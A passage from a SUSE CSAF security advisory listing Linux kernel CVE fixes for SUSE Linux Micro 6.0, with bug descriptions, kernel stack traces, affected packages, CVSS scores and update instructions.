"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54112",
"url": "https://www.suse.com/security/cve/CVE-2023-54112"
},
{
"category": "external",
"summary": "SUSE Bug 1256354 for CVE-2023-54112",
"url": "https://bugzilla.suse.com/1256354"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54112"
},
{
"cve": "CVE-2023-54113",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54113"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrcu: dump vmalloc memory info safely\n\nCurrently, for double invoke call_rcu(), will dump rcu_head objects memory\ninfo, if the objects is not allocated from the slab allocator, the\nvmalloc_dump_obj() will be invoke and the vmap_area_lock spinlock need to\nbe held, since the call_rcu() can be invoked in interrupt context,\ntherefore, there is a possibility of spinlock deadlock scenarios.\n\nAnd in Preempt-RT kernel, the rcutorture test also trigger the following\nlockdep warning:\n\nBUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:48\nin_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 1, name: swapper/0\npreempt_count: 1, expected: 0\nRCU nest depth: 1, expected: 1\n3 locks held by swapper/0/1:\n #0: ffffffffb534ee80 (fullstop_mutex){+.+.}-{4:4}, at: torture_init_begin+0x24/0xa0\n #1: ffffffffb5307940 (rcu_read_lock){....}-{1:3}, at: rcu_torture_init+0x1ec7/0x2370\n #2: ffffffffb536af40 (vmap_area_lock){+.+.}-{3:3}, at: find_vmap_area+0x1f/0x70\nirq event stamp: 565512\nhardirqs last enabled at (565511): [\u003cffffffffb379b138\u003e] __call_rcu_common+0x218/0x940\nhardirqs last disabled at (565512): [\u003cffffffffb5804262\u003e] rcu_torture_init+0x20b2/0x2370\nsoftirqs last enabled at (399112): [\u003cffffffffb36b2586\u003e] __local_bh_enable_ip+0x126/0x170\nsoftirqs last disabled at (399106): [\u003cffffffffb43fef59\u003e] inet_register_protosw+0x9/0x1d0\nPreemption disabled at:\n[\u003cffffffffb58040c3\u003e] rcu_torture_init+0x1f13/0x2370\nCPU: 0 PID: 1 Comm: swapper/0 Tainted: G W 6.5.0-rc4-rt2-yocto-preempt-rt+ #15\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x68/0xb0\n dump_stack+0x14/0x20\n __might_resched+0x1aa/0x280\n ? __pfx_rcu_torture_err_cb+0x10/0x10\n rt_spin_lock+0x53/0x130\n ? find_vmap_area+0x1f/0x70\n find_vmap_area+0x1f/0x70\n vmalloc_dump_obj+0x20/0x60\n mem_dump_obj+0x22/0x90\n __call_rcu_common+0x5bf/0x940\n ? debug_smp_processor_id+0x1b/0x30\n call_rcu_hurry+0x14/0x20\n rcu_torture_init+0x1f82/0x2370\n ? __pfx_rcu_torture_leak_cb+0x10/0x10\n ? __pfx_rcu_torture_leak_cb+0x10/0x10\n ? __pfx_rcu_torture_init+0x10/0x10\n do_one_initcall+0x6c/0x300\n ? debug_smp_processor_id+0x1b/0x30\n kernel_init_freeable+0x2b9/0x540\n ? __pfx_kernel_init+0x10/0x10\n kernel_init+0x1f/0x150\n ret_from_fork+0x40/0x50\n ? __pfx_kernel_init+0x10/0x10\n ret_from_fork_asm+0x1b/0x30\n \u003c/TASK\u003e\n\nThe previous patch fixes this by using the deadlock-safe best-effort\nversion of find_vm_area. However, in case of failure print the fact that\nthe pointer was a vmalloc pointer so that we print at least something.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54113",
"url": "https://www.suse.com/security/cve/CVE-2023-54113"
},
{
"category": "external",
"summary": "SUSE Bug 1256351 for CVE-2023-54113",
"url": "https://bugzilla.suse.com/1256351"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54113"
},
{
"cve": "CVE-2023-54115",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54115"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npcmcia: rsrc_nonstatic: Fix memory leak in nonstatic_release_resource_db()\n\nWhen nonstatic_release_resource_db() frees all resources associated\nwith an PCMCIA socket, it forgets to free socket_data too, causing\na memory leak observable with kmemleak:\n\nunreferenced object 0xc28d1000 (size 64):\n comm \"systemd-udevd\", pid 297, jiffies 4294898478 (age 194.484s)\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 f0 85 0e c3 00 00 00 00 ................\n 00 00 00 00 0c 10 8d c2 00 00 00 00 00 00 00 00 ................\n backtrace:\n [\u003cffda4245\u003e] __kmem_cache_alloc_node+0x2d7/0x4a0\n [\u003c7e51f0c8\u003e] kmalloc_trace+0x31/0xa4\n [\u003cd52b4ca0\u003e] nonstatic_init+0x24/0x1a4 [pcmcia_rsrc]\n [\u003ca2f13e08\u003e] pcmcia_register_socket+0x200/0x35c [pcmcia_core]\n [\u003ca728be1b\u003e] yenta_probe+0x4d8/0xa70 [yenta_socket]\n [\u003cc48fac39\u003e] pci_device_probe+0x99/0x194\n [\u003c84b7c690\u003e] really_probe+0x181/0x45c\n [\u003c8060fe6e\u003e] __driver_probe_device+0x75/0x1f4\n [\u003cb9b76f43\u003e] driver_probe_device+0x28/0xac\n [\u003c648b766f\u003e] __driver_attach+0xeb/0x1e4\n [\u003c6e9659eb\u003e] bus_for_each_dev+0x61/0xb4\n [\u003c25a669f3\u003e] driver_attach+0x1e/0x28\n [\u003cd8671d6b\u003e] bus_add_driver+0x102/0x20c\n [\u003cdf0d323c\u003e] driver_register+0x5b/0x120\n [\u003c942cd8a4\u003e] __pci_register_driver+0x44/0x4c\n [\u003ce536027e\u003e] __UNIQUE_ID___addressable_cleanup_module188+0x1c/0xfffff000 [iTCO_vendor_support]\n\nFix this by freeing socket_data too.\n\nTested on a Acer Travelmate 4002WLMi by manually binding/unbinding\nthe yenta_cardbus driver (yenta_socket).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54115",
"url": "https://www.suse.com/security/cve/CVE-2023-54115"
},
{
"category": "external",
"summary": "SUSE Bug 1256121 for CVE-2023-54115",
"url": "https://bugzilla.suse.com/1256121"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54115"
},
{
"cve": "CVE-2023-54117",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54117"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/dcssblk: fix kernel crash with list_add corruption\n\nCommit fb08a1908cb1 (\"dax: simplify the dax_device \u003c-\u003e gendisk\nassociation\") introduced new logic for gendisk association, requiring\ndrivers to explicitly call dax_add_host() and dax_remove_host().\n\nFor dcssblk driver, some dax_remove_host() calls were missing, e.g. in\ndevice remove path. The commit also broke error handling for out_dax case\nin device add path, resulting in an extra put_device() w/o the previous\nget_device() in that case.\n\nThis lead to stale xarray entries after device add / remove cycles. In the\ncase when a previously used struct gendisk pointer (xarray index) would be\nused again, because blk_alloc_disk() happened to return such a pointer, the\nxa_insert() in dax_add_host() would fail and go to out_dax, doing the extra\nput_device() in the error path. In combination with an already flawed error\nhandling in dcssblk (device_register() cleanup), which needs to be\naddressed in a separate patch, this resulted in a missing device_del() /\nklist_del(), and eventually in the kernel crash with list_add corruption on\na subsequent device_add() / klist_add().\n\nFix this by adding the missing dax_remove_host() calls, and also move the\nput_device() in the error path to restore the previous logic.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54117",
"url": "https://www.suse.com/security/cve/CVE-2023-54117"
},
{
"category": "external",
"summary": "SUSE Bug 1256348 for CVE-2023-54117",
"url": "https://bugzilla.suse.com/1256348"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54117"
},
{
"cve": "CVE-2023-54121",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54121"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix incorrect splitting in btrfs_drop_extent_map_range\n\nIn production we were seeing a variety of WARN_ON()\u0027s in the extent_map\ncode, specifically in btrfs_drop_extent_map_range() when we have to call\nadd_extent_mapping() for our second split.\n\nConsider the following extent map layout\n\n\tPINNED\n\t[0 16K) [32K, 48K)\n\nand then we call btrfs_drop_extent_map_range for [0, 36K), with\nskip_pinned == true. The initial loop will have\n\n\tstart = 0\n\tend = 36K\n\tlen = 36K\n\nwe will find the [0, 16k) extent, but since we are pinned we will skip\nit, which has this code\n\n\tstart = em_end;\n\tif (end != (u64)-1)\n\t\tlen = start + len - em_end;\n\nem_end here is 16K, so now the values are\n\n\tstart = 16K\n\tlen = 16K + 36K - 16K = 36K\n\nlen should instead be 20K. This is a problem when we find the next\nextent at [32K, 48K), we need to split this extent to leave [36K, 48k),\nhowever the code for the split looks like this\n\n\tsplit-\u003estart = start + len;\n\tsplit-\u003elen = em_end - (start + len);\n\nIn this case we have\n\n\tem_end = 48K\n\tsplit-\u003estart = 16K + 36K // this should be 16K + 20K\n\tsplit-\u003elen = 48K - (16K + 36K) // this overflows as 16K + 36K is 52K\n\nand now we have an invalid extent_map in the tree that potentially\noverlaps other entries in the extent map. Even in the non-overlapping\ncase we will have split-\u003estart set improperly, which will cause problems\nwith any block related calculations.\n\nWe don\u0027t actually need len in this loop, we can simply use end as our\nend point, and only adjust start up when we find a pinned extent we need\nto skip.\n\nAdjust the logic to do this, which keeps us from inserting an invalid\nextent map.\n\nWe only skip_pinned in the relocation case, so this is relatively rare,\nexcept in the case where you are running relocation a lot, which can\nhappen with auto relocation on.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54121",
"url": "https://www.suse.com/security/cve/CVE-2023-54121"
},
{
"category": "external",
"summary": "SUSE Bug 1256267 for CVE-2023-54121",
"url": "https://bugzilla.suse.com/1256267"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54121"
},
{
"cve": "CVE-2023-54125",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54125"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Return error for inconsistent extended attributes\n\nntfs_read_ea is called when we want to read extended attributes. There\nare some sanity checks for the validity of the EAs. However, it fails to\nreturn a proper error code for the inconsistent attributes, which might\nlead to unpredicted memory accesses after return.\n\n[ 138.916927] BUG: KASAN: use-after-free in ntfs_set_ea+0x453/0xbf0\n[ 138.923876] Write of size 4 at addr ffff88800205cfac by task poc/199\n[ 138.931132]\n[ 138.933016] CPU: 0 PID: 199 Comm: poc Not tainted 6.2.0-rc1+ #4\n[ 138.938070] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n[ 138.947327] Call Trace:\n[ 138.949557] \u003cTASK\u003e\n[ 138.951539] dump_stack_lvl+0x4d/0x67\n[ 138.956834] print_report+0x16f/0x4a6\n[ 138.960798] ? ntfs_set_ea+0x453/0xbf0\n[ 138.964437] ? kasan_complete_mode_report_info+0x7d/0x200\n[ 138.969793] ? ntfs_set_ea+0x453/0xbf0\n[ 138.973523] kasan_report+0xb8/0x140\n[ 138.976740] ? ntfs_set_ea+0x453/0xbf0\n[ 138.980578] __asan_store4+0x76/0xa0\n[ 138.984669] ntfs_set_ea+0x453/0xbf0\n[ 138.988115] ? __pfx_ntfs_set_ea+0x10/0x10\n[ 138.993390] ? kernel_text_address+0xd3/0xe0\n[ 138.998270] ? __kernel_text_address+0x16/0x50\n[ 139.002121] ? unwind_get_return_address+0x3e/0x60\n[ 139.005659] ? __pfx_stack_trace_consume_entry+0x10/0x10\n[ 139.010177] ? arch_stack_walk+0xa2/0x100\n[ 139.013657] ? filter_irq_stacks+0x27/0x80\n[ 139.017018] ntfs_setxattr+0x405/0x440\n[ 139.022151] ? __pfx_ntfs_setxattr+0x10/0x10\n[ 139.026569] ? kvmalloc_node+0x2d/0x120\n[ 139.030329] ? kasan_save_stack+0x41/0x60\n[ 139.033883] ? kasan_save_stack+0x2a/0x60\n[ 139.037338] ? kasan_set_track+0x29/0x40\n[ 139.040163] ? kasan_save_alloc_info+0x1f/0x30\n[ 139.043588] ? __kasan_kmalloc+0x8b/0xa0\n[ 139.047255] ? __kmalloc_node+0x68/0x150\n[ 139.051264] ? kvmalloc_node+0x2d/0x120\n[ 139.055301] ? vmemdup_user+0x2b/0xa0\n[ 139.058584] __vfs_setxattr+0x121/0x170\n[ 139.062617] ? __pfx___vfs_setxattr+0x10/0x10\n[ 139.066282] __vfs_setxattr_noperm+0x97/0x300\n[ 139.070061] __vfs_setxattr_locked+0x145/0x170\n[ 139.073580] vfs_setxattr+0x137/0x2a0\n[ 139.076641] ? __pfx_vfs_setxattr+0x10/0x10\n[ 139.080223] ? __kasan_check_write+0x18/0x20\n[ 139.084234] do_setxattr+0xce/0x150\n[ 139.087768] setxattr+0x126/0x140\n[ 139.091250] ? __pfx_setxattr+0x10/0x10\n[ 139.094948] ? __virt_addr_valid+0xcb/0x140\n[ 139.097838] ? __call_rcu_common.constprop.0+0x1c7/0x330\n[ 139.102688] ? debug_smp_processor_id+0x1b/0x30\n[ 139.105985] ? kasan_quarantine_put+0x5b/0x190\n[ 139.109980] ? putname+0x84/0xa0\n[ 139.113886] ? __kasan_slab_free+0x11e/0x1b0\n[ 139.117961] ? putname+0x84/0xa0\n[ 139.121316] ? preempt_count_sub+0x1c/0xd0\n[ 139.124427] ? __mnt_want_write+0xae/0x100\n[ 139.127836] ? mnt_want_write+0x8f/0x150\n[ 139.130954] path_setxattr+0x164/0x180\n[ 139.133998] ? __pfx_path_setxattr+0x10/0x10\n[ 139.137853] ? __pfx_ksys_pwrite64+0x10/0x10\n[ 139.141299] ? debug_smp_processor_id+0x1b/0x30\n[ 139.145714] ? fpregs_assert_state_consistent+0x6b/0x80\n[ 139.150796] __x64_sys_setxattr+0x71/0x90\n[ 139.155407] do_syscall_64+0x3f/0x90\n[ 139.159035] entry_SYSCALL_64_after_hwframe+0x72/0xdc\n[ 139.163843] RIP: 0033:0x7f108cae4469\n[ 139.166481] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 088\n[ 139.183764] RSP: 002b:00007fff87588388 EFLAGS: 00000286 ORIG_RAX: 00000000000000bc\n[ 139.190657] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 